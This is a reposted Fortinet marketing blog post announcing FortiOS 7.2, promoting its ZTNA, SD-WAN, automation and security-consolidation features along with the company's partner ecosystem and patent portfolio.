FortiOS 7.2 extends Fortinet’s innovation advantage even further by delivering new ways to converge networking and security across critical functions. New ZTNA enhancements make WFA deployments easier to deploy. Improvements to the industry’s most comprehensive portfolio of secure WAN edge solutions—SD-WAN, SD-Branch, 5G, and ZTNA—help teams achieve even better ROI. Advances in automation using new auto-deployment and zero-touch provisioning features increase uptime for the WAN and LAN Edge. And additional upgrades spread across NGFW, identity, micro-segmentation, SASE, AIOps and digital experience monitoring deliver powerful innovation for further networking and security convergence. 

Consolidating security increases efficiency, visibility, and control

Organizations that have taken a best-of-breed approach to security now face the challenge of vendor and solution sprawl. So, in addition to converging network and security, organizations must also begin consolidating the security products deployed across their ever-expanding attack surface to improve visibility, centralize management, orchestrate policy, and automate rapid threat detection and real-time response.

FortiOS 7.2 provides enhancements across Fortinet’s entire portfolio of network, endpoint, and cloud solutions that further consolidate security point products into a single broad, integrated, and automated platform. This deeper integration enables advanced vulnerability correlation and virtual patching to provide more comprehensive protection, including better security for IoT devices and advanced process automation so NOC and SOC teams can further simplify and automate their workflows.

In addition to FortiOS, the Fortinet Security Fabric platform is also built around common standards and open APIs that enable organizations to build a robust cybersecurity mesh architecture that includes investments in other security technologies. The Fortinet Fabric-Ready Technology Alliance Partner Program, one of the largest technology alliance ecosystems in the industry, brings together a community of global technology partners with specialized expertise. As a result of more than 400 integrations, customers can now more easily build a hybrid platform of integrated solutions to improve security effectiveness, reduce complexity, and simplify operations.

Fortinet’s Industry Leadership Enables Advanced Security Strategies

Fortinet’s commitment to innovation has led to the world’s most extensive and deeply integrated security and networking solutions portfolio. Our 1,255 patents are nearly three times that of comparable cybersecurity companies. We also regularly submit our products for impartial testing with the most prominent organizations in the industry. Those consistently top-tier results, combined with annual accolades and awards from leading analysts and industry organizations, and a strong commitment to R&D based in the United States and Canada, assure customers they can take a consolidated approach to security without ever sacrificing performance or protection.

Find out how Fortinet remains a global leader in broad, integrated and automated cybersecurity solutions: Fortinet Innovation series.

Source :
https://www.fortinet.com/blog/business-and-technology/fortios-7-2-converged-network-security-platform